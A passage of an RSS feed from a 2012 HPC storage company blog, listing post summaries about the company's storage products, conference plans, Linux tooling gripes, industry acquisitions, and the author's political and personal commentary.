      <guid>https://blog.scalability.org/2012/11/heavily-armed-rabbits/</guid>
      <description>Saw this blog post with a cartoon in it.
[ ](http://www.rscottillustration.com/image/lucky-rabbits-foot)
Those are armed rabbits. Sorta like JackRabbits. And that might not be the only definition of &amp;ldquo;ARMed&amp;rdquo; out there. Heavily ARMed JackRabbits. Not that I&amp;rsquo;m hinting at anything. Maybe people should just visit our booth 4154 at #SC12 &amp;hellip;</description>
    </item>
    
    <item>
      <title>On the dangers of economic prognostication, and presidential elections</title>
      <link>https://blog.scalability.org/2012/11/on-the-dangers-of-economic-prognostication-and-presidential-elections/</link>
      <pubDate>Fri, 02 Nov 2012 18:22:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/11/on-the-dangers-of-economic-prognostication-and-presidential-elections/</guid>
      <description>is drinking your own koolaid, consuming your own product, believing the wishful thinking that underlies your most serious predictions. Like this. Just like in catastrophic AGW, there&amp;rsquo;s one single chart that belies all the claims as to how &amp;ldquo;well&amp;rdquo; the &amp;ldquo;stimulus&amp;rdquo; package did. Its a damning chart. Here it is.
[ ](http://www.aei-ideas.org/2012/11/is-this-as-good-as-it-gets-novembers-dismal-new-normal-jobs-report/)
And worse, if you look at how the recovery compares to others &amp;hellip; its not going very well at all.</description>
    </item>
    
    <item>
      <title>Where I come from ...</title>
      <link>https://blog.scalability.org/2012/11/where-i-come-from/</link>
      <pubDate>Fri, 02 Nov 2012 03:35:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/11/where-i-come-from/</guid>
      <description>&amp;hellip; this is called being a mensch. Well played Michael Ferns, well played (in an respectful way). And welcome to Michigan and the Wolverines.</description>
    </item>
    
    <item>
      <title>Fads, waves of the future, etc.</title>
      <link>https://blog.scalability.org/2012/10/fads-waves-of-the-future-etc/</link>
      <pubDate>Thu, 01 Nov 2012 00:51:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/10/fads-waves-of-the-future-etc/</guid>
      <description>Fads are standing waves of marketing/sales/technology that have limited lifetime, yet generate buzz. Fads die out, and they consume resources during their existence. Fads rarely ever do more than help cull the herd &amp;hellip; assisting evolutionary processes that weed crappy technology dressed up nicely and packaged for sale. Best example of these I can come up with were the cycle stealing codes, that turned your machine into a &amp;ldquo;supercomputer&amp;rdquo; by aggregating cycles across many hundreds and thousands of machines.</description>
    </item>
    
    <item>
      <title>Not good</title>
      <link>https://blog.scalability.org/2012/10/not-good-2/</link>
      <pubDate>Wed, 31 Oct 2012 01:11:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/10/not-good-2/</guid>
      <description>Rich B at InsideHPC.com posts about the national labs exit from floorspace at SC12. The claim is due to budget cuts, but the GSA scandal and its fallout likely have a higher precedence to the upper echelon of decision makers. Which if you think about it, only a minute amount, you realize is the very definition of the cliche to cut ones nose off to spite their face. To any decision makers out there, this is the wrong thing to do.</description>
    </item>
    
    <item>
      <title>Ultradense and fast JackRabbit coming next week</title>
      <link>https://blog.scalability.org/2012/10/ultradense-and-fast-jackrabbit-coming-next-week/</link>
      <pubDate>Tue, 30 Oct 2012 03:22:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/10/ultradense-and-fast-jackrabbit-coming-next-week/</guid>
      <description>I don&amp;rsquo;t know that we&amp;rsquo;ll be able to get enough 4TB drives for all the units. We&amp;rsquo;ll talk about it some more at SC12, and should have a few units with 4TB, 3TB, and possibly 2TB drives in them. For those whom aren&amp;rsquo;t aware, our JackRabbit unit is already the fastest spinning disk single server that we are aware of in market. Its dense, up to 144TB in a 5U container.</description>
    </item>
    
    <item>
      <title>On the money</title>
      <link>https://blog.scalability.org/2012/10/on-the-money/</link>
      <pubDate>Sun, 28 Oct 2012 01:46:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/10/on-the-money/</guid>
      <description>Charles Stross (@cstross) is one of my favorite writers. We have wildly different views on things, but I like his writing, and his very clear thinking and story telling. Which is why I have to say that this blog post puts a nice context box around some of the things we hear about &amp;ldquo;saving the planet.&amp;rdquo; Something akin to this has been running around my head for a while, but not nearly as elegantly put.</description>
    </item>
    
    <item>
      <title>Oh joy ... a crash on our Amazon EC2 hosted web server</title>
      <link>https://blog.scalability.org/2012/10/oh-joy-a-crash-on-our-amazon-ec2-hosted-web-server/</link>
      <pubDate>Mon, 22 Oct 2012 18:58:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/10/oh-joy-a-crash-on-our-amazon-ec2-hosted-web-server/</guid>
      <description>[update 2] Yuppers, Amazon US East N. Virginia is experiencing issues. C.f. here.
Doug thought I did this with our IP update (larger block of static). So did I for a moment until I logged in. Partial failure on my part for not having the backup live/ready. Wlll remedy over the next day or two.
 [update] I think we can call this one a #fail.
Imagine if some small business with no technical acumen, sold on the &amp;ldquo;push this button to run your website&amp;rdquo; saw that error message.</description>
    </item>
    
    <item>
      <title>Interesting post on macroeconomic trends, risk, investment, and farms</title>
      <link>https://blog.scalability.org/2012/10/interesting-post-on-macroeconomic-trends-risk-investment-and-farms/</link>
      <pubDate>Sun, 21 Oct 2012 18:54:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/10/interesting-post-on-macroeconomic-trends-risk-investment-and-farms/</guid>
      <description>Saw this linked on from zerohedge. Understand that, to a degree, this is a sales pitch for this persons&#39; new fund. But the reasoning behind doing what they are doing is fascinating to me. Along with a description of what happened to the global financial markets.
Definitely worth the view just for the history and an analysis of macroeconomic trends.</description>
    </item>
    
    <item>
      <title>When you&#39;ve lost Dilbert ...</title>
      <link>https://blog.scalability.org/2012/10/when-youve-lost-dilbert/</link>
      <pubDate>Sun, 21 Oct 2012 00:05:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/10/when-youve-lost-dilbert/</guid>
      <description>&amp;hellip; the game may be over. Ok, this is a very well written, and extremely cogent argument. Scott Adams, creator of Dilbert, indicated why he&amp;rsquo;s not supporting Obama, and is endorsing Romney in the US Presidential election. His reasons boil down to a firing offense Mr. Obama committed (in Adams&#39; opinion). More specifically, he indicates that he doesn&amp;rsquo;t like lots of Romney&amp;rsquo;s positions, but Romney hasn&amp;rsquo;t committed this particular offense. And specifically to the point of competence, Adams gets that Romney is a turn-around guy.</description>
    </item>
    
    <item>
      <title>AMD has an SGI moment</title>
      <link>https://blog.scalability.org/2012/10/amd-has-an-sgi-moment/</link>
      <pubDate>Thu, 18 Oct 2012 20:35:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/10/amd-has-an-sgi-moment/</guid>
      <description>$131M quarterly loss. They have a looming 15% (think one out of every seven) RIF. I remember those from SGI days. I remember being on an ACS show floor, giving demos, and learning that some of my colleagues on the show floor with me, were part of the RIF. SGI itself isn&amp;rsquo;t doing well, but thats a story for another time. Still have lots of friends at AMD. Folks I&amp;rsquo;ve worked with and respect highly.</description>
    </item>
    
    <item>
      <title>Initial plans for SC12</title>
      <link>https://blog.scalability.org/2012/10/initial-plans-for-sc12/</link>
      <pubDate>Thu, 18 Oct 2012 18:06:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/10/initial-plans-for-sc12/</guid>
      <description>Assuming all the hardware is ready &amp;hellip; not sure, but hopefully it will be. We&amp;rsquo;ll have a siCluster at the booth. Powered by partner&amp;rsquo;s 10/40GbE fabric, and running a few different cluster file systems. FhGFS is a no brainer, it will be on there. Ceph should be on there. GlusterFS should be on there. Thinking about Lustre, may do this via our presentation layer, so we can avoid dealing with the pain of hyperspecialized kernels, and specific hard distro revision requirements.</description>
    </item>
    
    <item>
      <title>Beta version of FhGFS: now with mirror capability!</title>
      <link>https://blog.scalability.org/2012/10/beta-version-of-fhgfs-now-with-mirror-capability/</link>
      <pubDate>Thu, 18 Oct 2012 17:50:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/10/beta-version-of-fhgfs-now-with-mirror-capability/</guid>
      <description>One of the best parallel file systems just got better. FhGFS now has content mirroring (client and server side!) as well as other nice improvements! We&amp;rsquo;ve used the preceding release on our siFlash unit. I&amp;rsquo;ve not shared the results publicly to date, but suffice it to say that the performance was absolutely stellar (it helps that siFlash is the fastest 4U SSD/Flash tightly coupled computing and storage array in market). We are planning out our SC12 booth now.</description>
    </item>
    
    <item>
      <title>testing again</title>
      <link>https://blog.scalability.org/2012/10/testing-again/</link>
      <pubDate>Thu, 18 Oct 2012 17:18:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/10/testing-again/</guid>
      <description>hopefully it works this time &amp;hellip;</description>
    </item>
    
    <item>
      <title>Interesting and depressing article on Michigan&#39;s future</title>
      <link>https://blog.scalability.org/2012/10/interesting-and-depressing-article-on-michigans-future/</link>
      <pubDate>Thu, 18 Oct 2012 05:12:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/10/interesting-and-depressing-article-on-michigans-future/</guid>
      <description>A few prefaces &amp;hellip; First, I disagree with the premise throughout this article that our governor is timid. He is, IMO, and in many people&amp;rsquo;s opinion, doing a great job. Governor Romney is very similar to Governor Snyder in many ways. Timidity really isn&amp;rsquo;t apparent. I guess that people see someone making a cost-benefit analysis for engaging in a particular debate, or pushing for a particular outcome, and deciding to forgo a particular fight, as being timid.</description>
    </item>
    
    <item>
      <title>Growth</title>
      <link>https://blog.scalability.org/2012/10/growth/</link>
      <pubDate>Wed, 17 Oct 2012 18:48:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/10/growth/</guid>
      <description>I&amp;rsquo;ve hinted a little at what&amp;rsquo;s going on, but I haven&amp;rsquo;t come fully clean yet. Will do soon. I promise, though likely it will be public after SC12. Suffice it to say that the company is on a track to grow significantly in the near term. No, this is neither a capital raise, nor an acquisition. We have a practical problem. We&amp;rsquo;ll be setting up an office in NJ/NY area to serve our customer base there, and we will need extremely good technical and support people, along with some of the other folks we plan to put there.</description>
    </item>
    
    <item>
      <title>Update on the scammers spoofing our number</title>
      <link>https://blog.scalability.org/2012/10/update-on-the-scammers-spoofing-our-number/</link>
      <pubDate>Wed, 10 Oct 2012 20:19:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/10/update-on-the-scammers-spoofing-our-number/</guid>
      <description>We&amp;rsquo;ve started following an interesting suggestion made to us. It involves some cost, but its got the nice side effect of providing us (eventually) with the call data records from the phone company. Assume we will be getting the information we need, soon, to deal with this. We have a potent legal cocktail waiting for this information. Of course, the scammers decided to step things up a bit. One claimed to be with the FBI.</description>
    </item>
    
    <item>
      <title>Updated configs for storage</title>
      <link>https://blog.scalability.org/2012/10/updated-configs-for-storage/</link>
      <pubDate>Tue, 02 Oct 2012 19:03:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/10/updated-configs-for-storage/</guid>
      <description>Had neglected to mention this, but all of the day job&amp;rsquo;s units support 4TB drives. This means you can get 4U goodness up to 96TB, 5U goodness up to 192TB, and very soon (and we&amp;rsquo;ll start taking early orders for it) 4U with up to (about) 1/4 PB directly coupled to a very fast computer, with incredible amounts of IO and network bandwidth. Full 42U rack with about 2.5PB raw, and about 40GB/s sustained streaming write, and 60GB/s sustained streaming read performance in aggregate.</description>
    </item>
    
    <item>
      <title>Scalable Informatics at SC12 in Salt Lake City</title>
      <link>https://blog.scalability.org/2012/09/scalable-informatics-at-sc12-in-salt-lake-city/</link>
      <pubDate>Fri, 28 Sep 2012 19:57:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/09/scalable-informatics-at-sc12-in-salt-lake-city/</guid>
      <description>Bigger booth this year, number 4154 (10x20) &amp;hellip; last year was WAY too cramped. Planning stuff &amp;hellip; keeping it simple if possible. Maybe a minirack with a siCluster &amp;hellip; thinking about this hard. Definitely a dense storage system, an insanely fast storage system. Probably some streaming stuff, and pounding on IO similar to what we did at HPC on Wall Street. Will probably have a few partners with us (and their bits) in the booth.</description>
    </item>
    
    <item>
      <title>memtest delenda est</title>
      <link>https://blog.scalability.org/2012/09/memtest-delenda-est/</link>
      <pubDate>Wed, 26 Sep 2012 20:45:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/09/memtest-delenda-est/</guid>
      <description>Ok &amp;hellip; maybe not so much destroyed. More like &amp;ldquo;ignored as a reasonable test of anything but DIMM visibility, and very basic functionality&amp;rdquo;. Memtest has several variants running around, all of which purport to hammer on, and detect, bad RAM. The only problem is, it doesn&amp;rsquo;t really work well, apart from trivial cases. That is, if you have an iffy ram, you&amp;rsquo;d need days/weeks/months of testing with this code rather than putting it in a box and running a hard pounding code on it.</description>
    </item>
    
    <item>
      <title>Achieved warp speed this year ...</title>
      <link>https://blog.scalability.org/2012/09/achieved-warp-speed-this-year/</link>
      <pubDate>Mon, 24 Sep 2012 16:23:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/09/achieved-warp-speed-this-year/</guid>
      <description>:D More soon. I promise.</description>
    </item>
    
    <item>
      <title>Response to the 11&#43; GB/s unit was ... incredible ...</title>
      <link>https://blog.scalability.org/2012/09/response-to-the-11-gbs-unit-was-incredible/</link>
      <pubDate>Mon, 24 Sep 2012 01:02:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/09/response-to-the-11-gbs-unit-was-incredible/</guid>
      <description>We showed two large speedometers, one with Bandwidth, one with IOPs. These measured their data right off the hardware (via the device driver and block subsystem mechanisms). First, we ran a fio test with 96 threads reading 1.1TB of data in total. This took about 100 seconds or so. Second, we ran a fio test with 384 threads randomly reading 8k chunks of data out of that 1.1TB. Left them in a loop, with a big speedometer pair on the screen.</description>
    </item>
    
    <item>
      <title>Tiburon again saves the day</title>
      <link>https://blog.scalability.org/2012/09/tiburon-again-saves-the-day/</link>
      <pubDate>Mon, 24 Sep 2012 00:40:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/09/tiburon-again-saves-the-day/</guid>
      <description>Useful code (e.g. code == program) has a tendency to save you lots of pain when other solutions fail you. Powerful code lets you do things that lesser codes mess up. Intelligently designed and written codes allow you to debug them easily and quickly, as well as their operational impacts. None of these qualities describes grub. Grub is &amp;hellip; well &amp;hellip; grub. If you have to deal with it on a daily basis, you understand what I mean by this.</description>
    </item>
    
    <item>
      <title>turning siFlash past 10 (GB/s that is) ...</title>
      <link>https://blog.scalability.org/2012/09/turning-siflash-past-10-gbs-that-is/</link>
      <pubDate>Fri, 14 Sep 2012 06:17:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/09/turning-siflash-past-10-gbs-that-is/</guid>
      <description>Yeah, that title is a Spinal Tap homage. We are bringing a new siFlash unit to the HPC on Wall Street conference. This uses our new chassis, an updated kernel, and lots of tuning. Still have much more work to do &amp;hellip; but its probably good enough to ship now. I ran a few quick speed drills on it. 4.2 GB/s streaming write , and 10.7 GB/s streaming read with 96 simultaneous processes.</description>
    </item>
    
    <item>
      <title>IPMI Console Logger is born</title>
      <link>https://blog.scalability.org/2012/09/ipmi-console-logger-is-born/</link>
      <pubDate>Thu, 13 Sep 2012 02:06:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/09/ipmi-console-logger-is-born/</guid>
      <description>Here&amp;rsquo;s the problem I am trying to solve, call it a many year itch I&amp;rsquo;ve been wanting to scratch. We build very high performance storage clusters, extreme performance flash and ssd arrays, and a number of other things. At customer sites, while in use, a unit could crash. When it does, we really need a full console log to see the full crash log. Unfortunately, the &amp;ldquo;write to the screen&amp;rdquo; method gets very &amp;hellip; very old when you are trying to transcribe something &amp;hellip; thats happened to scroll off the screen.</description>
    </item>
    
    <item>
      <title>Not even wrong</title>
      <link>https://blog.scalability.org/2012/09/not-even-wrong/</link>
      <pubDate>Wed, 12 Sep 2012 03:33:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/09/not-even-wrong/</guid>
      <description>There&amp;rsquo;s a story about Wolfgang Pauli about how another physicist gave him a dubious paper to look over to get his opinion. Pauli, ever the critic, remarked about the paper something akin to this:
This is a way of saying that there are failures so deep, so fundamental, that one cannot get past them to deal with the basic issues of the underlying theory. If the fundamentals are off, there is no possible way that the theory could remain intact.</description>
    </item>
    
    <item>
      <title>slight change to site: comments</title>
      <link>https://blog.scalability.org/2012/09/slight-change-to-site-comments/</link>
      <pubDate>Sat, 08 Sep 2012 02:42:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/09/slight-change-to-site-comments/</guid>
      <description>We&amp;rsquo;ve been getting spammed. So I am now requiring comment submitters to have a previously allowed comment to be able to comment without issue. I hate doing this, but I don&amp;rsquo;t want this to become yet another waste of bits, lousy with comment spam. If this doesn&amp;rsquo;t work, I&amp;rsquo;ll change it to require user login to comment. [update] Since making the change, no spam has made it through, though they have tried.</description>
    </item>
    
    <item>
      <title>An avulsion fracture of 4th finger on left hand</title>
      <link>https://blog.scalability.org/2012/09/an-avulsion-fracture-of-4th-finger-on-left/</link>
      <pubDate>Fri, 07 Sep 2012 20:50:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/09/an-avulsion-fracture-of-4th-finger-on-left/</guid>
      <description>This is what I get for sparring with 13 year old black belts &amp;hellip; sigh &amp;hellip; starting to feel old :( Splint, ibuprofen, and no sparring for a while (could do 1 hand and 2 feet, but that requires a far larger ego than I have, not to mention some brass ones &amp;hellip; which I can&amp;rsquo;t say I have relative to my sparring abilities) . Probably can&amp;rsquo;t handle my bo either.</description>
    </item>
    
    <item>
      <title>OT:  A plea for help</title>
      <link>https://blog.scalability.org/2012/09/ot-a-plea-for-help/</link>
      <pubDate>Thu, 06 Sep 2012 20:59:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/09/ot-a-plea-for-help/</guid>
      <description>We have a problem. Some company has spoofed our telephone number for their caller ID, and have been calling up people harassing and threatening them. We get calls from many very pissed off people, and I have to explain the situation to them. Usually its one per week. We took 5-6 calls about this, just today. Ok. Gotta stop this. The folks doing this are dragging our name through the mud every time they do this, as they are misrepresenting themselves as us by using our phone number.</description>
    </item>
    
    <item>
      <title>[updated at bottom] Apparently there are people this profoundly ... well ... see for your self</title>
      <link>https://blog.scalability.org/2012/09/apparently-there-are-people-this-profoundly-well-see-for-your-self/</link>
      <pubDate>Thu, 06 Sep 2012 12:55:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/09/apparently-there-are-people-this-profoundly-well-see-for-your-self/</guid>
      <description>At first I was ready to discount this as &amp;ldquo;entrapment&amp;rdquo; or something like gonzo journalism. But &amp;hellip; its &amp;hellip; not &amp;hellip; A plain and simple question, nothing complex. Should we ban corporate profits? What is astounding, or horrifying is the location where it is being asked, and the seemingly normal people happily espousing what is basically a ridiculous concept.
Here is my take on this. First off, Peter Schiff is something of a notorious guy.</description>
    </item>
    
    <item>
      <title>Going over some old records</title>
      <link>https://blog.scalability.org/2012/09/going-over-some-old-records/</link>
      <pubDate>Thu, 06 Sep 2012 04:58:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/09/going-over-some-old-records/</guid>
      <description>&amp;hellip; and I ran across a situation where we helped out a customer, and we were screwed over after they decided not to pay a part of their bill. They don&amp;rsquo;t deny they owed it. They just didn&amp;rsquo;t want to pay it. And the hard part, being that they were out of country, in a different jurisdiction, there is little we could do. This is part of bleeding when you build a business.</description>
    </item>
    
    <item>
      <title>Excellent read on statistics and how people misuse it</title>
      <link>https://blog.scalability.org/2012/09/excellent-read-on-statistics-and-how-people-misuse-it/</link>
      <pubDate>Mon, 03 Sep 2012 01:38:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/09/excellent-read-on-statistics-and-how-people-misuse-it/</guid>
      <description>Link is here. I cannot tell you how many times I&amp;rsquo;ve had a conversation with a researcher, when we talk about statistics, and they quote me some high correlation coefficient as being evidence of causality. Any physical scientist, chemist, engineer, &amp;hellip; knows that you have to treat correlation coefficients very carefully, and you cannot substitute these for a real causal relationship with a backing theory that provides a testable model. That is, the causal relationship is fundamentally an aspect of the theory, with the latter able to guide you on making predictions.</description>
    </item>
    
    <item>
      <title>I had a sense this would work out well</title>
      <link>https://blog.scalability.org/2012/08/i-had-a-sense-this-would-work-out-well/</link>
      <pubDate>Fri, 31 Aug 2012 06:16:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/i-had-a-sense-this-would-work-out-well/</guid>
      <description>As I noted in an earlier post Joyent had discontinued an aging service, but one which many people had bought into, with the promise of &amp;ldquo;forever&amp;rdquo; service. I pointed out that in this sense, forever couldn&amp;rsquo;t mean, in a literal sense, forever &amp;hellip; But I had suggested as well that they would likely try to find a way to make a transition better for people. And they did.
This is perfect illustration of how to handle these transitions.</description>
    </item>
    
    <item>
      <title>Brittle, poorly designed pipelines</title>
      <link>https://blog.scalability.org/2012/08/brittle-poorly-designed-pipelines/</link>
      <pubDate>Thu, 30 Aug 2012 21:35:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/brittle-poorly-designed-pipelines/</guid>
      <description>One of the more powerful aspects of cluster and cloud computing is the effective requirement for building in fault tolerance of some sort, to a computational pipeline. You have to assume, in a wide computation scenario, that some aspect of your system may become unavailable. Which means you need a sane way to save state at critical points in your workflow. You need sane distribution and management of the workflow. You need to be able to route around errors.</description>
    </item>
    
    <item>
      <title>Two &#34;new&#34; projects</title>
      <link>https://blog.scalability.org/2012/08/two-new-projects/</link>
      <pubDate>Wed, 29 Aug 2012 23:44:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/two-new-projects/</guid>
      <description>Hyperspace and 26. One does something wholly unholy, and the other takes our significant advantage in a particular area and makes it &amp;hellip; well &amp;hellip; even more of an advantage. Hyperspace may be with us at HPC on Wall Street. Working on it with our partner in &amp;hellip; er &amp;hellip; alternative dimensions. Yeah. Thats the ticket! Assuming everything works out, you will hear about 26 before SC12, and probably see a few there.</description>
    </item>
    
    <item>
      <title>SmartOS now booting from Tiburon</title>
      <link>https://blog.scalability.org/2012/08/smartos-now-booting-from-tiburon/</link>
      <pubDate>Mon, 27 Aug 2012 22:06:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/smartos-now-booting-from-tiburon/</guid>
      <description>Ok &amp;hellip; took a little bit of hacking on Tiburon to add a capability I had long wanted to add in. And its not completely doing things the SmartOS way &amp;hellip; but it works for the moment.
[ ](/images/SmartOS-booted-from-Tiburon.png)
Have some additional testing to do, drivers to test, yadda yadda yadda. But the message should be clear. We can boot SmartOS from Tiburon (Scalable Informatics siCluster Storage and Computing cluster infrastructure).</description>
    </item>
    
    <item>
      <title>A code to measure IOPs/Bandwidth</title>
      <link>https://blog.scalability.org/2012/08/a-code-to-measure-iopsbandwidth/</link>
      <pubDate>Fri, 24 Aug 2012 04:44:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/a-code-to-measure-iopsbandwidth/</guid>
      <description>Many testing codes for storage systems report various values, by shoving IO down the pipe, and measuring amount shoved, and interval between the first IO call and &amp;ldquo;end&amp;rdquo; of last IO call. This is all well and good for some cases, but caching and many other effects get in the way of accurate measurement. Systems eventually settle down to an approximate state with small perturbations around this state. The problem is that most tools don&amp;rsquo;t quite report this.</description>
    </item>
    
    <item>
      <title>I see benchmarketing back in full swing</title>
      <link>https://blog.scalability.org/2012/08/i-see-benchmarketing-back-in-full-swing/</link>
      <pubDate>Fri, 24 Aug 2012 02:17:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/i-see-benchmarketing-back-in-full-swing/</guid>
      <description>I&amp;rsquo;ve read quite a few storage press releases talking about how &amp;ldquo;product X is capable of performance Y and IOPs Z.&amp;rdquo; I also notice that they didn&amp;rsquo;t say &amp;ldquo;we measured this, this way, and this is what we found.&amp;rdquo; I wonder why. I look at it this way, if we reported numbers the way lots of these folks report numbers, our JackRabbit JR5 machine would have a bandwidth of 6.2GB/s read and 5GB/s write.</description>
    </item>
    
    <item>
      <title>Rereading posts from 6 years ago ...</title>
      <link>https://blog.scalability.org/2012/08/rereading-posts-from-6-years-ago/</link>
      <pubDate>Wed, 22 Aug 2012 05:10:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/rereading-posts-from-6-years-ago/</guid>
      <description>NFS sucked then as well. We&amp;rsquo;ve got a customer whom occasionally pushes their hardware a wee bit too hard. And stuff comes crashing down. Basically it looks like a kernel bug, one I&amp;rsquo;ve not been able to ID for a number of reasons, and I can&amp;rsquo;t find a mechanism to reliably tickle it. This is the definition of a Heisenbug. Basically the problem is this. They use NFS, extensively. NFS is great for low level IO rates.</description>
    </item>
    
    <item>
      <title>started playing with SmartOS for the day job</title>
      <link>https://blog.scalability.org/2012/08/started-playing-with-smartos-for-the-day-job/</link>
      <pubDate>Wed, 22 Aug 2012 03:47:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/started-playing-with-smartos-for-the-day-job/</guid>
      <description>This is a very cool concept, something that meshes perfectly with our Tiburon based siCluster philosophy. That is, compute nodes should boot diskless, there should be very little state on each node, and stuff that you need to do should be made absolutely as simple as possible. SmartOS is a project of Joyent. Joyent, for those not familiar with them, are a cloud company, building a nice public cloud for end users to build on.</description>
    </item>
    
    <item>
      <title>Dear DEA ...</title>
      <link>https://blog.scalability.org/2012/08/dear-dea/</link>
      <pubDate>Mon, 20 Aug 2012 19:58:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/dear-dea/</guid>
      <description>According to this you don&amp;rsquo;t have enough high performance storage for your analyses.
First off, no, its not expensive. You are just using the wrong vendors. Second off &amp;hellip; please &amp;hellip; PLEASE &amp;hellip; call us. We&amp;rsquo;d be happy to hook you up with Petabytes for the price you are likely paying for Terabytes. Seriously. Our units are inexpensive enough that you could buy them, replicate the data across them, and then store them.</description>
    </item>
    
    <item>
      <title>one of the curious features of our history</title>
      <link>https://blog.scalability.org/2012/08/one-of-the-curious-features-of-our-history/</link>
      <pubDate>Sun, 19 Aug 2012 15:39:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/one-of-the-curious-features-of-our-history/</guid>
      <description>This is about learning, not from mistakes, but from a &amp;hellip; well &amp;hellip; empirical approach to &amp;ldquo;partnerships&amp;rdquo;. When I started up the company 10 years ago, we weren&amp;rsquo;t on anyones radar. Self funded, running out of my basement. Yeah, real big threat there. I noticed something though. During our time operating, first as an LLC, then as an Inc., we attracted a range of &amp;hellip; er &amp;hellip; partners and others. Many of whom would come to try to, for lack of a more accurate way to phrase this, pry ideas, plans, and IP/designs out of us.</description>
    </item>
    
    <item>
      <title>grub drive enumeration</title>
      <link>https://blog.scalability.org/2012/08/grub-drive-enumeration/</link>
      <pubDate>Fri, 17 Aug 2012 15:34:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/grub-drive-enumeration/</guid>
      <description>So there you are, helping a customer out with a problem. They&amp;rsquo;ve just added in a replacement OS disk using your process. At the end of the process is a bit of &amp;hellip; well &amp;hellip; an insurance procedure. Make sure grub is correctly on each drive in the RAID1. The grub.conf file has root (hd0,0) kernel .... root=/dev/md0 ... initrd ... Makes sense, right? Cause hd0 enumerates to the first bios drive used for booting in the boot list.</description>
    </item>
    
    <item>
      <title>What does &#34;forever&#34; really mean for a company?  And its implications for clouds ... and business models ...</title>
      <link>https://blog.scalability.org/2012/08/what-does-forever-really-mean-for-a-company-and-its-implications-for-clouds-and-business-models/</link>
      <pubDate>Thu, 16 Aug 2012 19:25:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/what-does-forever-really-mean-for-a-company-and-its-implications-for-clouds-and-business-models/</guid>
      <description>Note: in advance, this is not a slam on the company I will mention. I actually agree with their migration concept, even if I disagree with the details. In the early days of their life, Joyent made a lifetime offer for goods and services. These were pretty reasonable offerings, and the hook of
How long is it good for? As long as we exist.  As in &amp;hellip; forever. But what does &amp;ldquo;forever&amp;rdquo; actually mean?</description>
    </item>
    
    <item>
      <title>More M&amp;A:  IBM snarfs up Texas Memory Systems</title>
      <link>https://blog.scalability.org/2012/08/more-ma-ibm-snarfs-up-texas-memory-systems/</link>
      <pubDate>Thu, 16 Aug 2012 14:02:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/more-ma-ibm-snarfs-up-texas-memory-systems/</guid>
      <description>We knew that TMS was looking for a buyer. And IBM is a very intelligently run company, they see how the technologies are changing. IBM has grabbed TMS. This alters a bunch of playing fields. There are a shrinking pool of players out there available. Virident, STEC, and a few others. OCZ is occasionally rumored to be talking to Seagate and others. With TMS, IBM can now offer TMS metadata servers for GPFS, integrated.</description>
    </item>
    
    <item>
      <title>More M&amp;A: TCS grabs CRL</title>
      <link>https://blog.scalability.org/2012/08/more-ma-tcs-grabs-crl/</link>
      <pubDate>Thu, 16 Aug 2012 13:55:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/more-ma-tcs-grabs-crl/</guid>
      <description>TCS is arguably one of the more successful services groups out there. Cloud computing naturally fits into this, as cloud is AAS (As A Service). CRL has a localized bit of expertise in Pune, as well as customers pretty widely spread out. We&amp;rsquo;ve worked with them in the past, they have some of our gear. Dr. Vipin Chaudhary, CEO of CRL is a good friend and business partner going back a ways.</description>
    </item>
    
    <item>
      <title>Day job will be at HPC on Wall Street conference in NYC 19-Sept</title>
      <link>https://blog.scalability.org/2012/08/day-job-will-be-at-hpc-on-wall-street-conference-in-nyc-19-sept/</link>
      <pubDate>Wed, 15 Aug 2012 02:31:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/day-job-will-be-at-hpc-on-wall-street-conference-in-nyc-19-sept/</guid>
      <description>Still deciding what to bring &amp;hellip; at least one thing new (we have a number). Will have at least one partner in the booth, possibly more. Will be right by the coffee !!!! I can hook an IV straight from there &amp;hellip; Very excited! More info soon.</description>
    </item>
    
    <item>
      <title>OT:  Canton MI Olympian and an Olympian hopeful</title>
